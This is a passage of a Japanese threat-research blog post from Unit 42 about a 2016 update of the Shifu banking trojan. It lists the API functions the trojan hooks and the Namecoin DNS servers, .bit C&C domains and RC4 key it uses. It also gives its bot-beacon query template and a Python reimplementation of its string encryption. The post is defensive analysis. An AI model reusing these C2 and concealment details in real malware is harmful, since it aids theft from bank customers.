\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3001Web\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u3092\u884c\u3046\u305f\u3081\u306b\u30c7\u30a3\u30b9\u30af\u306b\u683c\u7d0d\u3057\u307e\u3059\u3002\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u3068\u6bd4\u3079\u3066\u3001Zend PHP\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u5411\u3051\u306e\u7279\u5b9a\u306e\u6a5f\u80fd\u3092\u793a\u30592\u3064\u306e\u6587\u5b57\u5217\u304c\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306b\u8ffd\u52a0\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">zend_stream_fixup<\/li>\n<li style=\"font-weight: 400;\">zend_compile_file<\/li>\n<\/ul>\n<h4>Svchost\u3067\u306e\u95a2\u6570\u306e\u30d5\u30c3\u30af<\/h4>\n<p style=\"font-weight: 400;\">\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u3068\u540c\u69d8\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001URL\u306e\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u3084\u30af\u30ea\u30c3\u30d7\u30dc\u30fc\u30c9\u306e\u6355\u6349\u3001\u30ad\u30fc\u30b9\u30c8\u30ed\u30fc\u30af\u306e\u8a18\u9332\u3092\u884c\u3046\u305f\u3081\u306b\u3001\u3044\u304f\u3064\u304b\u306eAPI\u95a2\u6570\u3092\u30d5\u30c3\u30af\u3057\u307e\u3059\u3002\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u30a4\u30f3\u30e9\u30a4\u30f3\u95a2\u6570\u30d5\u30c3\u30af\u3068\u3057\u3066\u77e5\u3089\u308c\u308b\u6280\u6cd5\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u3053\u306e\u6280\u6cd5\u3067\u306f\u3001\u3042\u308b\u95a2\u6570\u306e\u6700\u521d\u306e5\u30d0\u30a4\u30c8\u304c\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u30d5\u30c3\u30af \u30cf\u30f3\u30c9\u30e9\u306b\u30b8\u30e3\u30f3\u30d7\u3059\u308b\u3088\u3046\u30d1\u30c3\u30c1\u9069\u7528\u3055\u308c\u307e\u3059\u3002\u6b21\u306e\u95a2\u6570\u304c\u30d5\u30c3\u30af\u3055\u308c\u307e\u3059\u3002<\/p>\n<ul>\n<li>NtDeviceIoControlFile (ntdll.dll)<\/li>\n<li>ZwDeviceIoControlFile (ntdll.dll)<\/li>\n<li>GetClipboardData (user32.dll)<\/li>\n<li>GetMessageA (user32.dll)<\/li>\n<li>GetMessageW (user32.dll)<\/li>\n<li>TranslateMessage (user32.dll)<\/li>\n<li>GetAddrInfoExW (ws2_32.dll)<\/li>\n<li>gethostbyname (ws2_32.dll)<\/li>\n<li>getaddrinfo (ws2_32.dll)<\/li>\n<\/ul>\n<h4>\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u6a5f\u80fd<\/h4>\n<p style=\"font-weight: 400;\">Shifu\u306e\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001.bit\u306e\u30c8\u30c3\u30d7\u30ec\u30d9\u30eb \u30c9\u30e1\u30a4\u30f3\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u3053\u308c\u306f\u3001Namecoin\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306b\u57fa\u3065\u3044\u305f\u4e00\u5143\u5316\u3055\u308c\u3066\u3044\u306a\u3044DNS\u30b7\u30b9\u30c6\u30e0\u3067\u3059\u3002\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u6b21\u306e\u30cf\u30fc\u30c9\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u3055\u308c\u305fNamecoin DNS\u30b5\u30fc\u30d0\u306b\u5f8c\u3067\u63a5\u7d9a\u3059\u308b\u3053\u3068\u3067\u3001\u305d\u306e\u30c9\u30e1\u30a4\u30f3\u306eIP\u30a2\u30c9\u30ec\u30b9\u3092\u8981\u6c42\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">92.222.80.28<\/li>\n<li style=\"font-weight: 400;\">78.138.97.93<\/li>\n<li style=\"font-weight: 400;\">77.66.108.93<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">C&amp;C\u30c9\u30e1\u30a4\u30f3\u540d\u3001\u30e6\u30fc\u30b6\u30fc \u30a8\u30fc\u30b8\u30a7\u30f3\u30c8\u6587\u5b57\u5217\u3001\u304a\u3088\u3073URL\u30d1\u30e9\u30e1\u30fc\u30bf\u306f\u3001\u6539\u5909\u3055\u308c\u305fRC4\u6697\u53f7\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u7528\u3044\u3066\u6697\u53f7\u5316\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u5fa9\u53f7\u5316\u3055\u308c\u305f\u6587\u5b57\u5217\u306f\u6b21\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">klyatiemoskali.bit<\/li>\n<li style=\"font-weight: 400;\">slavaukraine.bit<\/li>\n<li style=\"font-weight: 400;\">Mozilla\/5.0 (Windows; U; Windows NT 5.2 x64; en-US; rv:1.9a1) Gecko\/20061007 Minefield\/3.0a1<\/li>\n<li style=\"font-weight: 400;\">L9mS3THljZylEx46ymJ2eqIdsEguKC15KnyQdfx4RTcVu8gCT<\/li>\n<li style=\"font-weight: 400;\">https:\/\/www.bing.com<\/li>\n<li style=\"font-weight: 400;\">\/english\/imageupload.php<\/li>\n<li style=\"font-weight: 400;\">\/english\/userlogin.php<\/li>\n<li style=\"font-weight: 400;\">\/english\/userpanel.php<\/li>\n<li style=\"font-weight: 400;\">1brz<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u6697\u53f7\u5316\u3055\u308c\u305f\u6587\u5b57\u5217\u306f\u3001.data\u30bb\u30af\u30b7\u30e7\u30f3\u5185\u3067\u6b21\u306e\u5f62\u5f0f\u3067\u683c\u7d0d\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\">&lt;LengthOfString&gt;&lt;EncryptedString&gt;<\/p>\n<p style=\"font-weight: 400;\">\u30c9\u30e1\u30a4\u30f3\u6587\u5b57\u5217\u201cklyatiemoskali\u201c\u306f\u3001\u300c\u30e2\u30b9\u30af\u30ef\u5e02\u6c11\u306b\u707d\u3044\u3092\u300d\u3068\u3044\u3046\u3088\u3046\u306a\u610f\u5473\u3067\u3059\u30022\u756a\u76ee\u306e\u30c9\u30e1\u30a4\u30f3\u6587\u5b57\u5217\u201cslavaukraine\u201d\u306f\u3001\u300c\u30a6\u30af\u30e9\u30a4\u30ca\u306b\u6804\u5149\u3092\u300d\u3068\u8a33\u305b\u307e\u3059\u3002\u3053\u3053\u306b\u542b\u307e\u308c\u308bRC4\u9375\u201cL9mS3THljZylEx46ymJ2eqIdsEguKC15KnyQdfx4RTcVu8gCT\u201d\u3092\u4f7f\u7528\u3057\u3066\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u304c\u6697\u53f7\u5316\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u5206\u6790\u6642\u306b\u306f\u3001\u5b9f\u969b\u306eC&amp;C\u30b5\u30fc\u30d0\u306eIP\u30a2\u30c9\u30ec\u30b9\u306b\u5fdc\u7b54\u3057\u3066\u3044\u305f\u306e\u306f\u6b21\u306eNamecoin DNS\u30b5\u30fc\u30d0\u306e\u307f\u3067\u3057\u305f\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">77.66.108.93 (ns1.dk.dns.d0wn.biz)<\/p>\n<figure id=\"attachment_23093\" aria-describedby=\"caption-attachment-23093\" style=\"width: 945px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_5.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-23093 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_5.png\" alt=\"\u56f35 77.66.108.93\u306eNamecoin DNS\u30b5\u30fc\u30d0\u60c5\u5831\" width=\"945\" height=\"691\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_5.png 945w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_5-590x430.png 590w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_5-900x658.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_5-300x219.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_5-768x562.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_5-370x271.png 370w\" sizes=\"(max-width: 945px) 100vw, 945px\" \/><\/a><figcaption id=\"caption-attachment-23093\" class=\"wp-caption-text\">\u56f35 77.66.108.93\u306eNamecoin DNS\u30b5\u30fc\u30d0\u60c5\u5831<\/figcaption><\/figure>\n<p style=\"font-weight: 400;\">\u6b21\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u306f\u3001Shifu\u306e\u52d5\u7684\u5206\u6790\u6642\u306b\u6355\u6349\u3055\u308c\u305f\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_23090\" aria-describedby=\"caption-attachment-23090\" style=\"width: 945px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_6.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-23090 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_6.png\" alt=\"\u56f36 Wireshark\u3067\u6355\u6349\u3055\u308c\u305fShifu\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30c8\u30e9\u30d5\u30a3\u30c3\u30af\" width=\"945\" height=\"500\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_6.png 945w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_6-900x476.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_6-300x159.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_6-768x406.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_6-370x196.png 370w\" sizes=\"(max-width: 945px) 100vw, 945px\" \/><\/a><figcaption id=\"caption-attachment-23090\" class=\"wp-caption-text\">\u56f36 Wireshark\u3067\u6355\u6349\u3055\u308c\u305fShifu\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30c8\u30e9\u30d5\u30a3\u30c3\u30af<\/figcaption><\/figure>\n<p style=\"font-weight: 400;\">IP\u30a2\u30c9\u30ec\u30b9\u3092\u53d6\u5f97\u3059\u308b\u305f\u3081\u306b\u3001Shifu\u304c\u30c9\u30e1\u30a4\u30f3\u540dklyatiemoskali.bit\u306eNamecoin DNS\u30b5\u30fc\u30d0\u3092\u554f\u3044\u5408\u308f\u305b\u305f\u3053\u3068\u304c\u5206\u304b\u308a\u307e\u3059\u3002\u30cd\u30fc\u30e0 \u30b5\u30fc\u30d0\u306e1\u3064\u304cC&amp;C\u30b5\u30fc\u30d0\u306eIP\u30a2\u30c9\u30ec\u30b9\u3067\u5fdc\u7b54\u3059\u308b\u3068\u3001TLS\u30cf\u30f3\u30c9\u30b7\u30a7\u30a4\u30af\u304c\u5b9f\u884c\u3055\u308c\u3066\u6697\u53f7\u5316\u3055\u308c\u305f\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30c1\u30e3\u30cd\u30eb\u304c\u958b\u304b\u308c\u307e\u3059\u3002\u6700\u5f8c\u306b\u3001\u3044\u304f\u3064\u304b\u306e\u6697\u53f7\u5316\u3055\u308c\u305f\u30c7\u30fc\u30bf\u304c\u9001\u4fe1\u3055\u308c\u3001\u305d\u308c\u306b\u5bfe\u3059\u308b\u6697\u53f7\u5316\u3055\u308c\u305f\u5fdc\u7b54\u304c\u53d6\u5f97\u3055\u308c\u307e\u3059\u3002\u305f\u3060\u3057\u3001\u5206\u6790\u6642\u306b\u306f\u3001\u305d\u308c\u4ee5\u5916\u306e\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u306f\u89b3\u5bdf\u3055\u308c\u306a\u304b\u3063\u305f\u306f\u305a\u3067\u3059\u3002\u5206\u6790\u6642\u306b\u306f\u3001\u30c9\u30e1\u30a4\u30f3\u540dklyatiemoskali.bit\u3068slavaukraine.bit\u304c\u3044\u305a\u308c\u3082\u3001IP\u30a2\u30c9\u30ec\u30b9103.199.16.106\u306b\u89e3\u6c7a\u3055\u308c\u305f\u306f\u305a\u3060\u304b\u3089\u3067\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">.bit\u306e\u30c8\u30c3\u30d7\u30ec\u30d9\u30eb \u30c9\u30e1\u30a4\u30f3\u306f\u3001Bitcoin\u30b7\u30b9\u30c6\u30e0\u306b\u57fa\u3065\u3044\u305fNamecoin\u6697\u53f7\u901a\u8ca8\u306b\u4f9d\u5b58\u3057\u3066\u3044\u308b\u305f\u3081\u3001\u3059\u3079\u3066\u306e\u53d6\u5f15\u3092\u8ffd\u8de1\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u3064\u307e\u308a\u3001Namecoin\u30d6\u30ed\u30c3\u30af \u30a8\u30af\u30b9\u30d7\u30ed\u30fc\u30e9\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u3067\u3001.bit\u30c9\u30e1\u30a4\u30f3\u304c\u3044\u3064\u767b\u9332\u3055\u308c\u3001\u3069\u306eIP\u30a2\u30c9\u30ec\u30b9\u306b\u63a5\u7d9a\u3055\u308c\u3066\u3044\u308b\u304b\u3092\u8abf\u3079\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u305f\u3068\u3048\u3070\u3001Web\u30b5\u30fc\u30d3\u30b9namecha.in\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\u3001klyatiemaskali.bit\u306b\u3064\u3044\u3066\u6b21\u306e\u60c5\u5831\u3092\u53d6\u5f97\u3067\u304d\u307e\u3059\u3002<\/p>\n<p><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_7.png\" rel=\"wpdevart_lightbox\"><img  class=\"size-full wp-image-23087 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_7.png\" alt=\"shifu_7\" width=\"945\" height=\"383\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_7.png 945w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_7-900x365.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_7-300x122.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_7-768x311.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_7-370x150.png 370w\" sizes=\"(max-width: 945px) 100vw, 945px\" \/><\/a><br \/>\nslavaukraine.bit\u306b\u3064\u3044\u3066\u3082\u540c\u69d8\u306e\u60c5\u5831\u3092\u8868\u793a\u3067\u304d\u307e\u3059\u3002<br \/>\n<a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_8.png\" rel=\"wpdevart_lightbox\"><img  class=\"size-full wp-image-23084 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_8.png\" alt=\"shifu_8\" width=\"945\" height=\"380\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_8.png 945w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_8-900x362.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_8-300x121.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_8-768x309.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_8-370x149.png 370w\" sizes=\"(max-width: 945px) 100vw, 945px\" \/><\/a><\/p>\n<p style=\"font-weight: 400;\">\u3069\u3061\u3089\u306e\u30c9\u30e1\u30a4\u30f3\u30822016-06-03\u306b\u767b\u9332\u3055\u308c\u3066\u304a\u308a\u3001\u305d\u308c\u3089\u306b\u5272\u308a\u5f53\u3066\u3089\u308c\u3066\u3044\u308b\u306e\u306f1\u3064\u306eIP\u30a2\u30c9\u30ec\u30b9\u306e\u307f\u3067\u3059\u3002\u3053\u306eIP\u30a2\u30c9\u30ec\u30b9\u306f\u3001\u6355\u6349\u3055\u308c\u305f\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u306b\u304a\u3051\u308bNamecoin DNS\u30b5\u30fc\u30d0\u306e\u5fdc\u7b54\u306b\u76f8\u5f53\u3057\u307e\u3059\u3002\u3055\u3089\u306b\u3001\u30c9\u30e1\u30a4\u30f3\u304c\u307e\u3060\u30a2\u30af\u30c6\u30a3\u30d6\u3067\u3042\u308b\u53ef\u80fd\u6027\u304c\u9ad8\u3044\u3053\u3068\u3082\u78ba\u8a8d\u3067\u304d\u307e\u3059\u3002<\/p>\n<h4>C&amp;C\u30b5\u30fc\u30d0\u306eURL\u30af\u30a8\u30ea\u6587\u5b57\u5217<\/h4>\n<p style=\"font-weight: 400;\">\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306b\u306f\u3001\u88ab\u5bb3\u8005\u306e\u60c5\u5831\u3092C&amp;C\u30b5\u30fc\u30d0\u306b\u9001\u4fe1\u3059\u308b\u969b\u306b\u4f7f\u7528\u3055\u308c\u308b\u30af\u30a8\u30ea\u6587\u5b57\u5217\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u304c\u542b\u307e\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">botid=%s&amp;ver=%s.%u&amp;up=%u&amp;os=%u&amp;ltime=%s%d&amp;token=%d&amp;cn=%s&amp;av=%s&amp;dmn=%s&amp;mitm=%u<\/p>\n<p style=\"font-weight: 400;\">\u4e00\u90e8\u306e\u60c5\u5831(\u30dc\u30c3\u30c8ID\u3001\u7a3c\u50cd\u6642\u9593\u3001\u30aa\u30da\u30ec\u30fc\u30c6\u30a3\u30f3\u30b0 \u30b7\u30b9\u30c6\u30e0 \u30d0\u30fc\u30b8\u30e7\u30f3\u3001\u30ed\u30fc\u30ab\u30eb \u30bf\u30a4\u30e0\u30b9\u30bf\u30f3\u30d7\u3001\u30c8\u30fc\u30af\u30f3\u3001\u30a2\u30f3\u30c1\u30a6\u30a4\u30eb\u30b9 \u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u3001\u30ef\u30fc\u30af\u30b9\u30c6\u30fc\u30b7\u30e7\u30f3\u306e\u30c9\u30e1\u30a4\u30f3\u540d\u3001\u691c\u51fa\u3055\u308c\u305f\u4e2d\u9593\u8005\u30a4\u30f3\u30bf\u30fc\u30bb\u30d7\u30b7\u30e7\u30f3)\u306f\u52d5\u7684\u306b\u53d6\u5f97\u3055\u308c\u308b\u3082\u306e\u306e\u3001\u30dc\u30c3\u30c8 \u30d0\u30fc\u30b8\u30e7\u30f3\u3084\u653b\u6483\u6d3b\u52d5\u540d\u306a\u3069\u306e\u9759\u7684\u306a\u5024\u3082\u9001\u4fe1\u3055\u308c\u308b\u3053\u3068\u304c\u5206\u304b\u308a\u307e\u3059\u3002\u4f5c\u6210\u3055\u308c\u305f\u30af\u30a8\u30ea\u6587\u5b57\u5217\u306f\u6b21\u306e\u3088\u3046\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">botid=26C47136!A5A4B18A!F2F924F2&amp;ver=1.759&amp;up=18294&amp;os=6110&amp;ltime=-8&amp;token=0&amp;cn=1brz&amp;av=&amp;dmn=&amp;mitm=0<\/p>\n<p style=\"font-weight: 400;\">Shifu\u306e\u5185\u90e8\u30d0\u30fc\u30b8\u30e7\u30f3\u306f\u201c1.759\u201d\u3067\u3001\u5f53\u8a72\u306e\u653b\u6483\u6d3b\u52d5\u540d\u306f\u201c1brz\u201d\u3067\u3042\u308b\u3053\u3068\u304c\u5206\u304b\u308a\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">Shifu\u306e\u30af\u30a8\u30ea\u6587\u5b57\u5217\u3092\u30012014\u5e742\u6708\u306b\u8ffd\u8de1\u3057\u305f\u6700\u8fd1\u306eShiz\u30d0\u30fc\u30b8\u30e7\u30f3\u306e1\u3064(\u5185\u90e8\u30d0\u30fc\u30b8\u30e7\u30f35.6.25)\u3068\u6bd4\u8f03\u3059\u308b\u3068\u3001\u3053\u308c\u30892\u3064\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u306f\u985e\u4f3c\u6027\u304c\u3042\u308b\u3053\u3068\u304c\u5206\u304b\u308a\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">botid=%s&amp;ver=5.6.25&amp;up=%u&amp;os=%03u&amp;ltime=%s%d&amp;token=%d&amp;cn=sochi&amp;av=%s<\/p>\n<h4>\u6539\u5909\u3055\u308c\u305fRC4\u6697\u53f7\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0<\/h4>\n<p style=\"font-weight: 400;\">Shifu\u306f\u3001RC4\u6697\u53f7\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u306e\u6539\u5909\u3055\u308c\u305f\u30d0\u30fc\u30b8\u30e7\u30f3\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u5f0a\u793e\u306fPython\u3067\u3053\u306e\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u518d\u69cb\u7bc9\u3059\u308b\u3053\u3068\u3067\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306b\u5b58\u5728\u3059\u308b\u30c9\u30e1\u30a4\u30f3\u540d\u201cklyatiemoskali.bit\u201d\u304c\u3069\u306e\u3088\u3046\u306b\u6697\u53f7\u5316\u3055\u308c\u308b\u304b\u3092\u4f8b\u8a3c\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true\">import os\r\nimport binascii\r\n\r\n###initial values##########\r\nstring = \"klyatiemoskali.bit\"\r\nseed = \r\n\"fnbqooqdaixfueangywblgabirdgvkewdyqgfqaioluesyrpryfkjerfsouemaxnavrkguxmcmhckwprunurmhehclermtufwi\r\nyjbqhwlunbunuumeowfjmerxppxrgaxukyx\"\r\nbuffer = [0] * (len(string))\r\ntable_encr = [0] * 0x102\r\ntable_encr[0x100] = 1\r\ntable_encr[0x101] = 0\r\n###########################\r\n\r\n###string2buffer###########\r\ni = 0\r\nwhile (i&lt;len(string)):\r\n    char_1 = string[i]\r\n    int_1 = ord (char_1)\r\n    buffer[i] = int_1\r\n    i += 1\r\n###string2buffer###########\r\n\r\n###encryption table########\r\ni = 0\r\nwhile (i &lt; 0x100):\r\n    table_encr[i] = 0x000000ff&amp;i\r\n    i += 1\r\n\r\ni = 0\r\nj = 0\r\nwhile (i &lt; 0x100):\r\n    char_1 = seed[j]\r\n    int_2 = ord (char_1)\r\n    table_encr[i] ^= int_2\r\n    i += 1\r\n    j += 1\r\n    if (j == len(seed)):\r\n        j = 0\r\n###########################\r\n\r\n###encryption##############\r\nsize_1 = len(string)\r\ni = 0\r\nwhile (size_1 != 0):\r\n    byte_buf = buffer[i]\r\n    ind_1 = table_encr[0x100]\r\n    ind_2 = table_encr[ind_1]\r\n    ind_3 = 0x000000ff&amp;(ind_2 + table_encr[0x101])\r\n    ind_4 = 0x000000ff&amp;(table_encr[ind_3])\r\n    table_encr[ind_1] = ind_4\r\n    table_encr[ind_3] = ind_2\r\n    buffer[i] = 0x000000ff&amp;(table_encr[0x000000ff&amp;(ind_2 + ind_4)] ^ byte_buf)\r\n    table_encr[0x100] = 0x000000ff&amp;(ind_1 + 1)\r\n    table_encr[0x101] = ind_3\r\n    i += 1\r\n    size_1 -= 1\r\n\r\ni = 0\r\nstr_1 = \"\"\r\nwhile (i &lt; len(string)):\r\n    str_1 = str_1 + chr(buffer[i])\r\n    i += 1\r\n###########################\r\n    \r\n###output##################\r\nprint (\"Cleartext string: %s\" % string)\r\nprint (\"Encrypted: 0x%s\" % binascii.hexlify(str_1)) \r\n###########################\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u6982\u8981 Shifu\u306f2015\u5e74\u306b\u521d\u3081\u3066\u767a\u898b\u3055\u308c\u305f\u30d0\u30f3\u30ad\u30f3\u30b0\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3067\u3042\u308a\u3001Zeus\u304c\u4f7f\u7528\u3057\u3066\u3044\u308b\u624b\u6cd5\u3092\u53d6\u308a\u8fbc\u3093\u3060Shiz\u30bd\u30fc\u30b9\u30b3\u30fc\u30c9\u306b\u57fa\u3065\u3044\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u8005\u306fShifu\u3092\u4f7f\u7528\u3057\u3066\u4e16\u754c\u4e2d\u306e\u30aa\u30f3\u30e9\u30a4\u30f3 \u30d0\u30f3\u30ad\u30f3\u30b0\u306eWeb<\/p>\n","protected":false},"author":23,"featured_media":106755,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4324,4434,1974,4428],"tags":[6527,7492,6391,4783],"product_categories":[],"coauthors":[1025],"class_list":["post-106805","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybercrime","category-cybercrime-ja","category-malware-ja","category-threat-research-ja","tag-banking-ja","tag-shifu","tag-threat-research-ja","tag-trojan-ja"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Shifu\u30d0\u30f3\u30ad\u30f3\u30b0\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e2016\u5e74\u306e\u66f4\u65b0<\/title>\n<meta name=\"description\" content=\"\u6982\u8981\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/\" \/>\n<meta property=\"og:locale\" content=\"ja_JP\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Shifu\u30d0\u30f3\u30ad\u30f3\u30b0\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e2016\u5e74\u306e\u66f4\u65b0\" \/>\n<meta property=\"og:description\" content=\"\u6982\u8981\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2017-01-06T20:00:36+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-04-27T04:49:58+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/04\/unit42-web-banner-650x300-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"650\" \/>\n\t<meta property=\"og:image:height\" content=\"300\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Unit 42\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. 